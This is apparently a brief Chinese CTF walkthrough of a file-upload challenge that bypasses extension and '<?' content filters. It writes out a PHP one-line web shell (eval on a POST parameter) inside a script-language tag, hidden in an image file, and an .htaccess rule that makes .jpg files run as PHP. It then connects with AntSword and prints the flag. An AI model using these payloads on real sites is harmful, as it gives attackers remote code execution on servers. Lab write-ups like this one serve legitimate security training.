打开靶机，上传文件抓包

后缀不能带ph，大小写也无法绕过，意味着phtml后缀也无法上传

对后缀只过滤ph，我们转变思路上传图片马，用.htaccess使图片马以php格式打开

上传图片马

上传失败，试一试过滤了哪些字符

文件内容过滤了<?

我们尝试另一种写法后成功上传<script language="php">eval($_POST['cmd']);</script>

再上传.htaccess AddType application/x-httpd-php .jpg

上传成功

查找flag过程中发现system函数被禁用，我们使用蚁剑连接

查询flag flag{dbcf4ba5-bbb0-410a-aa50-76871ab58350}